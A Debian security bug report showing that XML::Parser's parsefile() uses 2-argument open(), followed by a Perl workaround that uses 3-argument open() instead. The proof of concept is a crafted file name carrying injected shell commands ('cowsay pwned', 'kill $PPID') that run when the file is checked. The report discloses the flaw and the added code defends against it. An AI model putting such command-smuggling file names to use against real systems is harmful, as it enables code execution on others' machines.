Bug#923223: XML::Parser::parsefile() uses 2-argument open
Jakub Wilk
jwilk at jwilk.net
Mon Feb 25 08:31:22 GMT 2019
Package: libxml-parser-perl
Version: 2.44-2+b4
Tags: security
Control: affects -1 check-all-the-things duck
The XML::Parser::parsefile function uses 2-argument open().
As a consequence, users of this function can't use it to securely check
files with untrusted names. (Unless the users sanitize the filenames
themselves, which they don't, because AFAICT this behavior is not
documented.)
Proof of concept:
$ touch '; false .appdata; cowsay pwned >&2; kill $PPID |'
$ duck
sh: 1: ./: Permission denied
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Terminated
-- System Information:
Architecture: i386
Versions of packages libxml-parser-perl depends on:
ii perl 5.28.1-4
ii libc6 2.28-7
ii libexpat1 2.2.6-1
ii liburi-perl 1.76-1
ii libwww-perl 6.36-1
--
Jakub Wilk
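
A caller-side workaround for the behaviour reported above, as an added example that is not part of the original report or of XML::Parser: open the file with 3-argument open() and pass the already-open handle to parse() instead of calling parsefile(). The helper name parse_untrusted_path and the sample file name and contents are constructed for illustration.

```perl
#!/usr/bin/perl
# Added example (not from the bug report): parse a file whose name is untrusted
# without letting Perl's 2-argument open() interpret characters in that name.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;
use XML::Parser;

# Hypothetical helper: open the path ourselves with 3-argument open(), where
# the mode is a separate argument and the name is taken literally, then hand
# the open handle to parse().
sub parse_untrusted_path {
    my ($parser, $path) = @_;
    open(my $fh, '<', $path) or die "cannot open '$path': $!\n";
    binmode($fh);    # raw bytes; expat reads the document's own encoding declaration
    my $result = eval { $parser->parse($fh) };
    my $err    = $@;
    close($fh);
    die $err if $err;
    return $result;
}

# Constructed sample: a name ending in " |", which 2-argument open() would
# treat as a command to run rather than as a file to read.
my $dir  = tempdir(CLEANUP => 1);
my $path = File::Spec->catfile($dir, 'sample.appdata.xml |');
open(my $out, '>', $path) or die "cannot create '$path': $!\n";
print {$out} "<component><id>constructed.example</id></component>\n";
close($out);

# Record the name of the first start tag seen, i.e. the root element.
my $root;
my $parser = XML::Parser->new(
    Handlers => { Start => sub { $root //= $_[1] } },
);
parse_untrusted_path($parser, $path);
print "parsed literal file, root element: $root\n";
```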